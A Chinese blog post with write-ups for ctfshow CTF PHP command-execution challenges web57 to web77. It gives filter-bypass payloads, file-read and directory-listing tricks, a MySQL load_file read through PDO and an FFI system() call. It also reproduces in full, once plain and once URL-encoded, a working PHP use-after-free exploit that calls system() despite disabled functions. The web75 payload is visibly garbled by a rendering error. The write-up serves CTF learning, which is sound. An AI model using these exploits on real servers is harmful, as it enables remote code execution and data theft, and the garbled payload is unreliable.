web57-web77

于 2025-09-12 17:43:56 发布
阅读量887 收藏 19
点赞数 14
CC 4.0 BY-SA版权
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_77769584/article/details/151088551

web 57

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

这里又是无字母显示,根据提示知道flag在36.flag,我们只要构造36,而在Linux中
$(())=0 (( ((~(( (())))=-1
然后重复36次,让值等于负37 然后取反 直接得到36所以payload就是
本来的值是$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(()))))) 然后取反就得到:

$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

web 58-web65

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

这题的姿势非常多,只是禁止了system函数的执行,但是可以使用

print_r(file(“flag.php”));

还可以用copy(“flag.php”,“flag.txt”); 然后访问txt
还可以用highlight_file(“flag.php”); 来直接读取文件

web 66

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

还是这样的只是flag不在这个文件夹里,所以我们查看一下文件夹

print_r(scandir(“/”));
然后看到其实目标是flag.txt,在根目录里面,所以
c=highlight_file(“/flag.txt”);

web 67

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

跟上一题一样就是把print_r过滤了我们只要换成var_dump就可以,跟上一步一样流程

web 68

highlight_file被过滤所以看不到源码了,然后还是一样的先看根目录,然后看到根目录地下有一个flag.txt 利用文件包含的include(“/flag.php”) 得到flag

web 69

这一题其实是过滤了var_dump 我们换成var_export函数就可以进行目录读取,所以我们直接查看根上面的题目一样的操作
c=var_export(scandir(“/”));
c=include(“/flag.txt”);

web70

还是跟上一题一样操作

web71

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

你要上天吗?

这一题就是将所有输出的值全部替换成???,ob_get_contents()的意思是获得缓冲区的所有内容,所以就会把所有的内容全部替换,但是如果后面再加上一个exit();直接退出,进行执行就可以跳过所以Payload就是

c=var-export(scandir(“/”));exit();

web 72

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

你要上天吗?

这题过滤了之前的scandir这种可以直接查看目录的函数,所以这道题要用到glob伪协议来解决

c=?> <?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__tostring().' ' );} exit(0)?>
?>是一个闭合 然后新建一个DirectoryIterator对象这是php自带的类用来遍历数组,然后glob//是协议 然后/是根目录的信息 然后foreach遍历a的所有值给到f 然后通过tosring返回所有文件名 ,最后结束脚本
或者还有更简单的 c=var_export(scandir('glob:///'));exit(); 这样也能遍历根目录

这样就出现了文件名 bin dev etc flag0.txt home lib media mnt opt proc root run sbin srv sys tmp usr var
然后用include还是包含不了flag0.txt 需要用到uaf 逆向的脚本

<?php

function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { 

                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { 
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {

        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }


    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); 
    write($abc, 0xd0 + 0x68, $zif_system); 

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat flag0.txt");ob_end_flush();
?>

但是这样并不能执行,还要进行url编码

c=function%20ctfshow(%24cmd)%20%7B%0A%20%20%20%20global%20%24abc%2C%20%24helper%2C%20%24backtrace%3B%0A%0A%20%20%20%20class%20Vuln%20%7B%0A%20%20%20%20%20%20%20%20public%20%24a%3B%0A%20%20%20%20%20%20%20%20public%20function%20__destruct()%20%7B%20%0A%20%20%20%20%20%20%20%20%20%20%20%20global%20%24backtrace%3B%20%0A%20%20%20%20%20%20%20%20%20%20%20%20unset(%24this-%3Ea)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24backtrace%20%3D%20(new%20Exception)-%3EgetTrace()%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if(!isset(%24backtrace%5B1%5D%5B’args’%5D))%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24backtrace%20%3D%20debug_backtrace()%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20class%20Helper%20%7B%0A%20%20%20%20%20%20%20%20public%20%24a%2C%20%24b%2C%20%24c%2C%20%24d%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20str2ptr(%26%24str%2C%20%24p%20%3D%200%2C%20%24s%20%3D%208)%20%7B%0A%20%20%20%20%20%20%20%20%24address%20%3D%200%3B%0A%20%20%20%20%20%20%20%20for(%24j%20%3D%20%24s-1%3B%20%24j%20%3E%3D%200%3B%20%24j–)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24address%20%3C%3C%3D%208%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24address%20%7C%3D%20ord(%24str%5B%24p%2B%24j%5D)%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20return%20%24address%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20ptr2str(%24ptr%2C%20%24m%20%3D%208)%20%7B%0A%20%20%20%20%20%20%20%20%24out%20%3D%20%22%22%3B%0A%20%20%20%20%20%20%20%20for%20(%24i%3D0%3B%20%24i%20%3C%20%24m%3B%20%24i%2B%2B)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24out%20.%3D%20sprintf(%22%25c%22%2C(%24ptr%20%26%200xff))%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24ptr%20%3E%3E%3D%208%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20return%20%24out%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20write(%26%24str%2C%20%24p%2C%20%24v%2C%20%24n%20%3D%208)%20%7B%0A%20%20%20%20%20%20%20%20%24i%20%3D%200%3B%0A%20%20%20%20%20%20%20%20for(%24i%20%3D%200%3B%20%24i%20%3C%20%24n%3B%20%24i%2B%2B)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24str%5B%24p%20%2B%20%24i%5D%20%3D%20sprintf(%22%25c%22%2C(%24v%20%26%200xff))%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24v%20%3E%3E%3D%208%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20leak(%24addr%2C%20%24p%20%3D%200%2C%20%24s%20%3D%208)%20%7B%0A%20%20%20%20%20%20%20%20global%20%24abc%2C%20%24helper%3B%0A%20%20%20%20%20%20%20%20write(%24abc%2C%200x68%2C%20%24addr%20%2B%20%24p%20-%200x10)%3B%0A%20%20%20%20%20%20%20%20%24leak%20%3D%20strlen(%24helper-%3Ea)%3B%0A%20%20%20%20%20%20%20%20if(%24s%20!%3D%208)%20%7B%20%24leak%20%25%3D%202%20%3C%3C%20(%24s%20*%208)%20-%201%3B%20%7D%0A%20%20%20%20%20%20%20%20return%20%24leak%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20parse_elf(%24base)%20%7B%0A%20%20%20%20%20%20%20%20%24e_type%20%3D%20leak(%24base%2C%200x10%2C%202)%3B%0A%0A%20%20%20%20%20%20%20%20%24e_phoff%20%3D%20leak(%24base%2C%200x20)%3B%0A%20%20%20%20%20%20%20%20%24e_phentsize%20%3D%20leak(%24base%2C%200x36%2C%202)%3B%0A%20%20%20%20%20%20%20%20%24e_phnum%20%3D%20leak(%24base%2C%200x38%2C%202)%3B%0A%0A%20%20%20%20%20%20%20%20for(%24i%20%3D%200%3B%20%24i%20%3C%20%24e_phnum%3B%20%24i%2B%2B)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24header%20%3D%20%24base%20%2B%20%24e_phoff%20%2B%20%24i%20*%20%24e_phentsize%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24p_type%20%20%3D%20leak(%24header%2C%200%2C%204)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24p_flags%20%3D%20leak(%24header%2C%204%2C%204)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24p_vaddr%20%3D%20leak(%24header%2C%200x10)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24p_memsz%20%3D%20leak(%24header%2C%200x28)%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20if(%24p_type%20%3D%3D%201%20%26%26%20%24p_flags%20%3D%3D%206)%20%7B%20%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24data_addr%20%3D%20%24e_type%20%3D%3D%202%20%3F%20%24p_vaddr%20%3A%20%24base%20%2B%20%24p_vaddr%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24data_size%20%3D%20%24p_memsz%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20else%20if(%24p_type%20%3D%3D%201%20%26%26%20%24p_flags%20%3D%3D%205)%20%7B%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24text_size%20%3D%20%24p_memsz%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20if(!%24data_addr%20%7C%7C%20!%24text_size%20%7C%7C%20!%24data_size)%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20false%3B%0A%0A%20%20%20%20%20%20%20%20return%20%5B%24data_addr%2C%20%24text_size%2C%20%24data_size%5D%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20get_basic_funcs(%24base%2C%20%24elf)%20%7B%0A%20%20%20%20%20%20%20%20list(%24data_addr%2C%20%24text_size%2C%20%24data_size)%20%3D%20%24elf%3B%0A%20%20%20%20%20%20%20%20for(%24i%20%3D%200%3B%20%24i%20%3C%20%24data_size%20%2F%208%3B%20%24i%2B%2B)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24leak%20%3D%20leak(%24data_addr%2C%20%24i%20*%208)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if(%24leak%20-%20%24base%20%3E%200%20%26%26%20%24leak%20-%20%24base%20%3C%20%24data_addr%20-%20%24base)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24deref%20%3D%20leak(%24leak)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24deref%20!%3D%200x746e6174736e6f63)%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20else%20continue%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%24leak%20%3D%20leak(%24data_addr%2C%20(%24i%20%2B%204)%20*%208)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if(%24leak%20-%20%24base%20%3E%200%20%26%26%20%24leak%20-%20%24base%20%3C%20%24data_addr%20-%20%24base)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24deref%20%3D%20leak(%24leak)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if(%24deref%20!%3D%200x786568326e6962)%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20else%20continue%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20%24data_addr%20%2B%20%24i%20*%208%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20get_binary_base(%24binary_leak)%20%7B%0A%20%20%20%20%20%20%20%20%24base%20%3D%200%3B%0A%20%20%20%20%20%20%20%20%24start%20%3D%20%24binary_leak%20%26%200xfffffffffffff000%3B%0A%20%20%20%20%20%20%20%20for(%24i%20%3D%200%3B%20%24i%20%3C%200x1000%3B%20%24i%2B%2B)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24addr%20%3D%20%24start%20-%200x1000%20*%20%24i%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24leak%20%3D%20leak(%24addr%2C%200%2C%207)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if(%24leak%20%3D%3D%200x10102464c457f)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%24addr%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20get_system(%24basic_funcs)%20%7B%0A%20%20%20%20%20%20%20%20%24addr%20%3D%20%24basic_funcs%3B%0A%20%20%20%20%20%20%20%20do%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24f_entry%20%3D%20leak(%24addr)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24f_name%20%3D%20leak(%24f_entry%2C%200%2C%206)%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20if(%24f_name%20%3D%3D%200x6d6574737973)%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20leak(%24addr%20%2B%208)%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24addr%20%2B%3D%200x20%3B%0A%20%20%20%20%20%20%20%20%7D%20while(%24f_entry%20!%3D%200)%3B%0A%20%20%20%20%20%20%20%20return%20false%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20trigger_uaf(%24arg)%20%7B%0A%0A%20%20%20%20%20%20%20%20%24arg%20%3D%20str_shuffle(‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA’)%3B%0A%20%20%20%20%20%20%20%20%24vuln%20%3D%20new%20Vuln()%3B%0A%20%20%20%20%20%20%20%20%24vuln-%3Ea%20%3D%20%24arg%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20if(stristr(PHP_OS%2C%20’WIN’))%20%7B%0A%20%20%20%20%20%20%20%20die(‘This%20PoC%20is%20for%20*nix%20systems%20only.’)%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%24n_alloc%20%3D%2010%3B%20%0A%20%20%20%20%24contiguous%20%3D%20%5B%5D%3B%0A%20%20%20%20for(%24i%20%3D%200%3B%20%24i%20%3C%20%24n_alloc%3B%20%24i%2B%2B)%0A%20%20%20%20%20%20%20%20%24contiguous%5B%5D%20%3D%20str_shuffle(‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA’)%3B%0A%0A%20%20%20%20trigger_uaf(‘x’)%3B%0A%20%20%20%20%24abc%20%3D%20%24backtrace%5B1%5D%5B’args’%5D%5B0%5D%3B%0A%0A%20%20%20%20%24helper%20%3D%20new%20Helper%3B%0A%20%20%20%20%24helper-%3Eb%20%3D%20function%20(%24x)%20%7B%20%7D%3B%0A%0A%20%20%20%20if(strlen(%24abc)%20%3D%3D%2079%20%7C%7C%20strlen(%24abc)%20%3D%3D%200)%20%7B%0A%20%20%20%20%20%20%20%20die(%22UAF%20failed%22)%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%24closure_handlers%20%3D%20str2ptr(%24abc%2C%200)%3B%0A%20%20%20%20%24php_heap%20%3D%20str2ptr(%24abc%2C%200x58)%3B%0A%20%20%20%20%24abc_addr%20%3D%20%24php_heap%20-%200xc8%3B%0A%0A%20%20%20%20write(%24abc%2C%200x60%2C%202)%3B%0A%20%20%20%20write(%24abc%2C%200x70%2C%206)%3B%0A%0A%20%20%20%20write(%24abc%2C%200x10%2C%20%24abc_addr%20%2B%200x60)%3B%0A%20%20%20%20write(%24abc%2C%200x18%2C%200xa)%3B%0A%0A%20%20%20%20%24closure_obj%20%3D%20str2ptr(%24abc%2C%200x20)%3B%0A%0A%20%20%20%20%24binary_leak%20%3D%20leak(%24closure_handlers%2C%208)%3B%0A%20%20%20%20if(!(%24base%20%3D%20get_binary_base(%24binary_leak)))%20%7B%0A%20%20%20%20%20%20%20%20die(%22Couldn’t%20determine%20binary%20base%20address%22)%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20if(!(%24elf%20%3D%20parse_elf(%24base)))%20%7B%0A%20%20%20%20%20%20%20%20die(%22Couldn’t%20parse%20ELF%20header%22)%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20if(!(%24basic_funcs%20%3D%20get_basic_funcs(%24base%2C%20%24elf)))%20%7B%0A%20%20%20%20%20%20%20%20die(%22Couldn’t%20get%20basic_functions%20address%22)%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20if(!(%24zif_system%20%3D%20get_system(%24basic_funcs)))%20%7B%0A%20%20%20%20%20%20%20%20die(%22Couldn’t%20get%20zif_system%20address%22)%3B%0A%20%20%20%20%7D%0A%0A%0A%20%20%20%20%24fake_obj_offset%20%3D%200xd0%3B%0A%20%20%20%20for(%24i%20%3D%200%3B%20%24i%20%3C%200x110%3B%20%24i%20%2B%3D%208)%20%7B%0A%20%20%20%20%20%20%20%20write(%24abc%2C%20%24fake_obj_offset%20%2B%20%24i%2C%20leak(%24closure_obj%2C%20%24i))%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20write(%24abc%2C%200x20%2C%20%24abc_addr%20%2B%20%24fake_obj_offset)%3B%0A%20%20%20%20write(%24abc%2C%200xd0%20%2B%200x38%2C%201%2C%204)%3B%20%0A%20%20%20%20write(%24abc%2C%200xd0%20%2B%200x68%2C%20%24zif_system)%3B%20%0A%0A%20%20%20%20(%24helper-%3Eb)(%24cmd)%3B%0A%20%20%20%20exit()%3B%0A%7D%0A%0Actfshow(%22cat%20%2Fflag0.txt%22)%3Bob_end_flush()%3B%0A%3F%3E

这样才能得到flag,脚本太难了根本看不懂,过段时间再回来看

web73

这题就简单多了,上面的发方法都可以接着用,然后还有一些被解放出来的函数,先查看根目录

c=var_export(scandir(‘glob:///*’));exit();
c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__tostring().' ');} exit();?>
c=include(“/flagc.txt”);exit();

都可以查看根目录的情况,然后这题开放了inculde所以可以执行c=include(“/flagc.txt”);exit();就能得出flag

web74

同上,但是var_export不能继续使用了只能用DirectoryIterator配合glob伪协议来进行所以先查看根目录

c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__tostring().' ');} exit();?>
在这里插入图片描述
看到flagx.txt所以我们直接尝试include
c=include(“/flagx.txt”);exit();
得出flag在这里插入图片描述

web 75

还是这样看不到源码,还是先看根目录的信息,然后再看接下来的部分,所以还是用DirectoryIteratot 来进行扫描根目录
c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__tostring().' ');} exit();?>
然后看到flag36.txt
但是接下来包含不了。用uaf脚本也执行不了,是使用PDO连接mysql数据库的方式来进行命令执行
wp答案是这样的

c=try {dbh=newPDO(′mysql:host=localhost;dbname=ctftraining′,′root′,′root′);foreach(dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach(dbh=newPDO(mysql:host=localhost;dbname=ctftraining,root,root);foreach(dbh->query(‘select load_file(“/flag36d.txt”)’) as KaTeX parse error: Expected '}', got 'EOF' at end of input: row){echo(row[0]).“|”; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

还可以使用Php脚本

try {
	# 创建 PDO 实例, 连接 MySQL 数据库
	$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
	
	# 在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。
	foreach($dbh->query('select load_file("/flag36.txt")') as $row) {
		echo($row[0])."|";
	}
	
	$dbh = null;
}

catch (PDOException $e) {
	echo $e->getMessage();exit(0);
}

exit(0);

得到flag

web76

和75一样,用PDO连接数据库来读取文件,一样的解法,具体还是看不懂,再研究研究

web77

还是没有源码,但是可以不能用PDO来连接数据库,这题我们还是用上面几道题一样的看根目录

c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__tostring().' ');} exit();?>

然后发现了一个readflag的文件还有一个flag的文件,看wp大家说直接用FFI的方法读取readflag,php中的FFi扩展的意思就是在php中执行c语言的代码,通过php来进行一个system函数,把flag文件的内容读取到另一个文件中,就是把文件内容弄到一个新文件,然后访问新文件

$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象
$a='/readflag > 1.txt';//没有回显的
$ffi->system($a);//通过$ffi去调用system函数

所以payload就是:
c=$ffi=FFI::cdef("int system(const char *command);"); $a='readflag>1.txt'; $ffi->system($a);

在这里插入图片描述

Z_renascence
关注
web开发规范 - 图片规范
🏆 前端领域优质创作者
06-30 6108
基本规则 所有页面元素类图片均放入img文件夹, 测试用图片放于img/demoimg文件夹; 图片格式仅限于gif || png || jpg; 命名全部用小写英文字母 || 数字 || _ 的组合,其中不得包含汉字 || 空格 || 特殊字符;尽量用易懂的词汇, 便于团队其他成员理解; 另, 命名分头尾两部分, 用下划线隔开, 比如ad_left01.gif || btn_submit.gif...
本地安装Ollama+WebUI
jiafeitutu的博客
09-11 3324
本地安装Ollama和WebUI
windows安装stable-diffusion-webui教程
08-07 3287
整合包对非技术出身的同学比较友好,因为秋叶大佬把相关的东西已经都整合好了,只需要点点点就行了。当然懂编程的同学就更没有问题了。
SpringBootWeb-入门了解 Swagger 的具体使用
小扳手
07-12 9810
其中设置 apis(RequestHandlerSelectors.basePackage("需要扫描的项目名")) 该属性是很重要的,项目中要测试的方法或者类在具体包的包名。简单来说,通过这些注解就可以对类、方法、方法中的属性进行说明,在测试方法的过程中,可以很清晰的明白该方法或者类的用途、信息。4)@ApiOperation("对方法进行描述"):用在方法上,例如 Controller 的方法,说明方法的用途、作用。2)Swagger 在开发阶段使用的框架,帮助后端开发人员的接口测试。
JAVA WEB----完整的登陆界面前端优化
a1422346935的博客
05-23 4017
做完了之前的登陆界面后,我们要优化界面,使界面看起来,更加美观 第一步:去网站上下载Adminlte官网上下载框架 第二步:选择要使用的页面 把login.jsp和dist和plugins移动到idea后运行程序 第三步:修改使用的页面的代码 把login.jsp和dist和plugins移动到idea后运行程序 <%@ page contentType="text/html;charset=UTF-8" language="java" %> <!DOCTYPE html> &l
WEB-INF下的静态资源为什么不能访问的问题
hunt_er的博客
03-10 2462
在进行WEB开发时遇到WEB-INF下的静态资源不能访问的问题,反复调试,终于想通。 由于WEB-INF目录下资源文件安全性都是很高的。它是不能直接通过浏览器来访问。 只能通过服务器来访问------所以WEB-INF目录下一般存放的是lib文件夹(项目需要用到的jar包),服务器的配置文件web.xml,以及一些访问安全性较高的jsp/html页面(通常是后台管理页面)。 如果要访问WEB...
IntelliJ IDEA 2017创建Web项目web文件夹下没有WEB-INFO解决步骤
杭电鬼先生交流中心
02-03 3369
今天开发一个javaweb的时候发现的一个IntelliJ IDEA的创建问题,并没有找到web-info和web.xml,解决方案如下 1.创建一个javaweb项目 创建完毕以后的项目目录是这样的 web里面没有web-infowe文件夹和web.xml 2.使用Ctrl+Shift+Alt+S组合键打开ProjectStructure,点击左侧Facts,再点击Web,再...
访问WEB-INF目录中的文件
09-07 4415
